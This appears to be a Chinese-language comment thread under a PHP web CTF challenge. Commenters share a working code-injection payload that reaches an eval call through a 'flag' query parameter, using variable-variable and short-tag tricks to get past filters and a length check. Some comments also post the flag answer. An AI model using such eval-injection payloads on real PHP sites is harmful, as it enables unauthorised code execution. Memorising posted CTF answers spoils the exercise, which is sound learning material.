15614005380 @ 2024-03-07 23:20:46 👍0
小白花了50分钟带做带理解,感觉做出来的人太天才了,把php玩的这么六,深刻的感受到web的上限就是web开发能力。
Daniel2023 @ 2024-03-07 23:20:46 👍0
payload: /?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111111
coo1an @ 2023-10-07 23:20:46 👍0
1、长度是年9, 2、利用短标签和替代,<?php echo $flag;?>使用短标签(<? echo $flag;?>,,再继续使用短标签替代echo ,<?= $flag;?> flag=$f=%274lag%27;$f{0}=%27f%27;?%3E%3C?=$$f;?%3E111111111111111111
110-没办法 @ 2023-07-07 23:20:46 👍0
flag{78062956}
wxy1343 @ 2023-06-07 23:20:46 👍0
flag{78062956}
w登临意 @ 2023-06-07 23:20:46 👍0
好难
阿Q啊 @ 2023-06-07 23:20:46 👍0
但是不精通php不会写,就很难受,只能看别人的writeup的payload
阿Q啊 @ 2023-06-07 23:20:46 👍2
这题关键在于eval函数,绕过前面几个if的判断条件进入到最后一个if判断条件,由于存在eval函数,可以构造php代码执行,直接输出flag,这题有意思!!
哎嘿嘿1314 @ 2023-06-07 23:20:46 👍0
牛皮
http://xxxxxxxxxx/?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111333